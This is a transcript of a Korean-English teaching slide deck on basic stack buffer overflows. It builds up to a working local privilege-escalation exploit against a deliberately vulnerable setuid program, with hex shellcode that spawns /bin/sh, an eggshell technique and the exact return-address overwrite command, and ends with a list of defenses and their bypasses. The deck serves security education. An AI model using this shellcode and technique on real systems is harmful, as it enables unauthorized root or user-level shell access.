Basic of Buffer Over Flow

Presentation on theme: "Basic of Buffer Over Flow"— Presentation transcript:

1 Basic of Buffer Over Flow
S.S.G 방승원

2 Agenda Introduction Memory Structure Stack Structure while Example
Target Program Ready & Attack Attack & Security Application of Overflow

3 Introduction Overflow ?? Buffer Over Flow ?? 넘치다, 넘쳐 흐르다;범람하다;
<용기 등이> 가득 차다, 넘치다 Buffer Over Flow ?? 정해진 메모리보다 많은 데이터를 입력 받아 특정 영역을 덮음으로써 프로그램 흐름을 바꿔 공격자가 원하는 코드를 실행하는 공격 <Phrack Magazine 49-14>, Aleph One

4 Memory Structure TEXT : TEXT Program Code DATA : Static Variable
LOW TEXT TEXT : Program Code DATA : Static Variable Global Variable HEAP : Dynamic Allocation STACK Dynamic Varbiable Local Variable DATA HEAP STACK HIGH

5 Stack Structure LIFO(Last In First Out) PUSH POP STACK
Memory LOW (0x ) Stack HIGH STACK LIFO(Last In First Out) PUSH POP SP(Stack Pointer) BP(Base Pointer) PUSH POP C B Memory HIGH (0xbfffffff) A Stack LOW SP BP

6 Example Program #include <stdio.h>
void func(int a, int b, int c) { int buf1; char buf2[16]; } void main() func(1, 2, 3); printf(“Hello, World!\n”);

7 Example Program STACK #include <stdio.h>
Memory LOW (0x ) Stack HIGH STACK buf2 #include <stdio.h> void func(int a, int b, int c) { int buf1; char buf2[16]; } void main() func(1, 2, 3); printf(“Hello, World!\n”); buf1 Stack Frame Pointer Return Address 1 2 Memory HIGH (0xbfffffff) 3 Stack LOW ESP EBP

8 Example Program STACK main: pushl $3 pushl $2 pushl $1 call func
ESP Memory LOW (0x ) Stack HIGH STACK buf2 main: pushl $3 pushl $2 pushl $1 call func addl $16, %esp func: pushl %ebp movl %esp, %ebp subl $40, %esp leave (pop %ebp ret buf1 Dummy EBP Stack Frame Pointer Return Address 1 2 Memory HIGH (0xbfffffff) 3 Stack LOW

9 Target Program #include <stdio.h> #include <string.h>
void func(char *str) { char buf[64]; strcpy(buf, str); } void main(int argc, char *argv[]) func(argv[1]); printf(“Hello, World\n”); argc, argv 프로그램을 실행 할 때 인자를 입력받는 방법 ex) ./target bang 1234 argv = 3; argv[0] = “target”; argv[1] = “bang”; argv[2] = “1234”; strcpy(dest, src) src가 가르키는 문자열을 dest로 복사 * 크기 제한이 없어 overflow 취약점 발생

10 Target Program Setuid Bit 가 걸려있음 Set User ID Bit(number – 4000)
$ chmod 4755 target (or chmod u+s) -rwsr-xr-x 1 level1 level1 target  어떤 사용자든지 이 target을 실행할 땐 level1 유저권한을 갖게 됨 ex) passwd Redhat 9.0, Kernel , gcc

11 Target Program Let’s Run program With a lot of ‘A’ Character!!!
Result : Segmentation Fault Why??

12 Target Program ESP Memory LOW (0x ) Stack HIGH STACK buf #include <stdio.h> #include <string.h> void func(char *str) { char buf[64]; strcpy(buf, str); } void main(int argc, char *argv[]) func(argv[1]); printf(“Hello, World\n”); Dummy EBP SFP RET Memory HIGH (0xbfffffff) str = argv[1] Stack LOW

13 Target Program STACK $ ./target `perl -e 'print "A"x71'` Normal Memory
HIGH Memory LOW $ ./target `perl -e 'print "A"x71'` 64 Bytes Bytes Bytes Bytes Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ] Stack LOW Stack HIGH Normal

14 Target Program STACK $ ./target `perl -e 'print "A"x72'` Overflow
Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x72'` 64 Bytes Bytes Bytes Bytes Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ] Stack LOW Stack HIGH Overflow

15 Target Program STACK $ ./target `perl -e 'print "A"x80'` Real Overflow
Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x80'` 64 Bytes Bytes Bytes Bytes Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ AAAA ][ AAAA ][ BBFFFFBB ] Stack LOW Stack HIGH Real Overflow

16 Target Program STACK Memory LOW Stack HIGH A Dummy SFP [ BFFFFFBF ]
SP Memory LOW (0x ) Stack HIGH func: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave ret main: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func subl $12, %esp STACK A Dummy E BP SFP [ BFFFFFBF ] RET [ BBFFFF08 ] Memory HIGH (0xbfffffff) str Stack LOW

17 Target Program STACK Memory LOW Stack HIGH A Dummy [ AAAA ]
SP Memory LOW (0x ) Stack HIGH func: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave ret main: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func subl $12, %esp STACK A 0x (??) Dummy [ AAAA ] E BP SFP [ AAAA ] RET [ AAAA ] Memory HIGH (0xbfffffff) str Stack LOW

18 Shell Code 쉘을 실행해주는 코드 #include <unistd.h> void main() {
char *shell[2]; setreuid(3001, 3001); shell[0] = "/bin/sh"; shell[1] = NULL; execve(shell[0], shell, NULL); } 어셈코드 "\x31\xc0\x31\xdb\x31\xc9\x66\xbb” “\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46” “\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88” ”\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3” ”\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31” ”\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";

19 Attack Ready Segmentation Fault 확인 쉘코드 제작
쉘코드를 버퍼에다 넣었을 때, 그 버퍼의 주소를 찾아야 됨 But, 버퍼의 주소를 추측하기가 어려움 그러므로 쉘 환경 변수에 쉘코드를 넣어서 사용하여 쉘코드의 주소를 계산해 주는 Eggshell 사용

20 Attack bash-2.05b$ ./egg 512 200 Using address: 0xbffffa60
bash-2.05b$ ./target `perl -e 'print "A"x76';(printf "\x60\xfa\xff\xbf")` sh-2.05b$ id uid=3001(level1) gid=1000(guest) groups=1000(guest) sh-2.05b$

21 Attack V.S Security Non-executable Stack  Return Into Libc
 Omega Project Stack Guard and Stack Shield  Bypass Stack Guard and Stack Shield Random Stacks Exec Shield(커널수준)  Exec Shield 회피 strcpy(), strcat(), gets(), fscanf(), scanf(), sprintf() 등 사용 자제 -> strncpy() strncat() 사용 And so on………

22 Application of Overflow
Windows, Unix, Linux, Mac Local, Remote Web -> ActiveX Heap Overflow Integer Overflow Frame Pointer Overwrite